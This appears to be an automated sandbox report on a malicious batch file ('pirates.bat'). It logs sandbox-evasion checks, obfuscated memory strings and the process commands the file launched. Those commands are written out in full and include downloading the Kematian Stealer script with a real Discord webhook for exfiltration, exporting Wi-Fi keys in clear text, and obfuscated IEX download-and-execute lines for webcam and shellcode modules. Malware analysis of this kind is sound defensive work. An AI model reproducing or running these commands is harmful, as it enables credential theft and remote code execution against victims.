            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
            Queries memory information (via WMI often done to detect virtual machines)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
            Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Service
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDisk
            Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_StartupCommand
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A874014F20 rdtscp 48_2_000002A874014F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3867Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2047Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4595Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 580Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6632Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3132Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7714Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1904Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4975
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3799
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6028
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 2846 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 3867 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 2047 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4595 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 580 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 80 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep count: 6632 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 3132 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5300Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5024Thread sleep count: 3799 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 6028 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -21213755684765971s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %wakEfMV%s%cojzOPIe%%vogJUEbI%e%ebzsysTD%%laiSicjT%t%fQcShQemU% %NuUzuJtn%/%nDxuTEzg%%pfSMieA%a%QplGTrgZ% %UWnAzcE%a%nvFBkIR%%fjrIQUMiO%n%zcvhjdLFz%%mzsMGgF%s%GcmLnbC%%BgEmeYpv%=%pMGywEtmT%%LLvvlYTVO%2%COexsRh%%ExxYNJzn%*%JUznDAFoA%%zVHhkRFwF%0%xScWFnxmj%%avCKDEdqu%x%QUtfhXCb%%zyYtrbr%3%BEeEZmlkv%%mluphFm%*%uytJOtur%%KTgHGBd%0%KPQgTNMwx%%BPfdOCP%x%APAXDlCAX%%SsBGbanLm%3%XEwKdEbx%%UkbUZsvZx%*%bBqWivDE%%wFCNSCSCL%0%WSwXrqbUB%%odhNmJba%x%qSspIPQwr%%yPqqZDQDf%1%gWHRDyoW%%mHvDIccQF%7%MkUFkgFnc%%mXWPaZgSE%*%TfgKYuXNQ%%HJozCLxYO%0%JNxbZhZjg%%IIZfEgBYB%4%DzDvOxM%%BMUqtbadN%5%SHFlEJBw%%EmuYLnEI%*%rzJPsjpco%%pzFbbGVeF%0%ssHOGgXF%%CFyrsZBh%x%GIJIsOcy%%zncFnHeA%2%SAXjsAOZe%%gEPXiXyu%5%vSKVLCy%
            Source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\user-PC\root\cimv2:Win32_Service.Name="vmicvss"
            Source: powershell.exe, 00000028.00000002.2916277864.0000017E80442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvssr
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %jhZwFJrEQ%f%HJENGKG%%PIkGVpiM%o%fBEJLKwkb%%XsGpQMyT%r%VfTUMvQWo% %YTimIren%/%ByvgNYtIe%%cvhQWLoI%l%WoluWdjVp% %%u %EkJsXojCR%i%ICpMnLvk%%kZoNLFGY%n%LARRHdPcj% %HJMvMaHNb%(%FJfTSkOcw%%LbyyFQGhM%4%holCjom%%rFmAAftrB%2%gMbWonbXb%%fPSksLPQT%8%eqTwsiX%%hkFXwrN%,%MIQDwJkwb% %hGFsWRGRw%4%tImrQIXb%%HPPInImuQ%2%fOcMPyQ%%tPZvHMf%8%GMnKLZtY%%fHBWRne%,%iQlQevF% %vAxctCbR%4%SeEGnbJF%%CQaAtDFyG%2%dEHURwaUp%%yNHJnYkI%8%jKJywkQRW%%stUMlvDK%)%ZCQzSoyY% %WoyeTiJj%d%dcobDZIoX%%vwRzTvnD%o%kRgWpPtp% %HEHqMYxBF%(%qxrydzMB% %PdIEHCnx%s%UwusUzu%%JrMyPeZOG%^%zIUiepTZ%%AQrydrW%e%wnPzFiN%%JSJgpkPJw%t%tSBWgouLq% %exSapBV%"%szhGatTqZ%%ybLstiW%O%ArdvsTl%%XldoMaxpS%1%KNMLNhp%%FlDBOvt%=%oVJDIDl%%tdnkSFFZ%N%nvsBQxRv%%fPOIrbxO%"%dboGvGN% %UKtiGyQFq%)%hraXXmbp%
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HQOOuhKl%s%WFhjBtcRQ%%TDPCjZhx%^%QJItmSxl%%oxCKsrW%e%tuvDcQAnB%%FGflIochq%^%fftEfRzLB%%GqzlqIoe%t%xdkStLixy% %KnPCDHlNK%/%TLeujVYD%%GCUOXzKU%a%dtcIAYO% %pMLQfGswQ%a%zSjvLjUF%%VnHFfAM%^%hVDmzHMl%%rCUKVVfq%n%LxClGAMh%%BaxqbKq%^%rOoRlhMwa%%yGPLEDMQ%s%FiCNoSq%%bKUmdKeZ%^%qPJknuV%%ChQemug%=%zbveWFhpL%%ArqlDxpb%2%fogoRXO%%KZLZtIr%*%OAuhDtsa%%OzVwIUxrs%0%EzxZVKZ%%TkPMhlIl%x%CcCtNWJCY%%JMlMmVVth%b%rqHadpbe%%MkyPPFt%*%uheScgw%%UjppRgGu%0%zFrlTvQcQ%%eFtNVIV%1%FCHvDUm%%lHYEygBpE%3%pgxtpyp%%SiwzvxF%*%fuUwFfrP%%blqAgFB%(%qhwmWVW%%lTisDYXt%0%BiSbeRk%%vxxiopH%x%GjAkPny%%IoaPkAFSJ%7%wXSqXEhDl%%LapMpPX%1%vYnRGIYS%%BFkMXloZn%c%XCBqgFxW%%eAJeXGV%^%pUByqBMD%%hRtsyRTdR%^%xgWWogax%%lFuCyAwEn%0%TGRjzDUkm%%cXXqrUw%1%XkIOUijkG%%YlKuViF%3%sjfXiWfp%%rrGkByIt%2%XaJMSaP%%hfICwIkb%3%pXhuSXyc%%grhcHdHQY%)%geseIWz%
            Source: powershell.exe, 00000030.00000002.2636336709.000002A872CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
            Source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\user-PC\root\cimv2:Win32_Service.Name="vmicshutdown"
            Source: powershell.exe, 00000014.00000002.1784865495.000001EC5F0C4000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000002B.00000003.2047003000.00000179D1FC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000028.00000002.2901496097.0000017E80180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A874014F20 rdtscp 48_2_000002A874014F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbsJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\doskey.exe doskey CALL=SHIFTJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1Jump to behavior
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clearJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) Jump to behavior
